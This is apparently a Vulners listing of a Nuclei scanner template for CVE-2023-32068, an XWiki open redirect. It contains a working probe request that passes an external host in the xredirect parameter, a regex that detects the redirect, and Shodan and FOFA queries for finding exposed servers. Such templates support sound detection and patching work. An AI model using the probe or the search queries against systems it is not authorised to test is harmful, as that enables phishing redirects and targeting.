Lucene search
K

XWiki - Open Redirect

๐Ÿ—“๏ธย 03 Jul 2026ย 03:01:05Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 33ย Views

XWiki Platform open redirect vulnerability allows attackers to redirect users to malicious websites using crafted URLs. Patched in versions 14.10.4 and 15.0

Related
Refs
Code
id: CVE-2023-32068

info:
  name: XWiki - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.
  impact: |
    An attacker can craft malicious URLs to redirect users to malicious websites.
  remediation: |
    Implement proper input validation and sanitize user-controlled input to prevent open redirect vulnerabilities.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-20096
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32068
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-32068
    cwe-id: CWE-601
    epss-score: 0.5507
    epss-percentile: 0.98904
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2023,xwiki,redirect,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
# digest: 490a004630440220392ff9469c6b383da934fa465d91897e6a4b85ffd8504c762a789f4d4cd2b7ea02202bc6b36a3b806d12126443de169c3faf897ccadbd7746284cb537dc8fa8c3848:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.14.7 - 6.1
EPSS0.5507
SSVC
33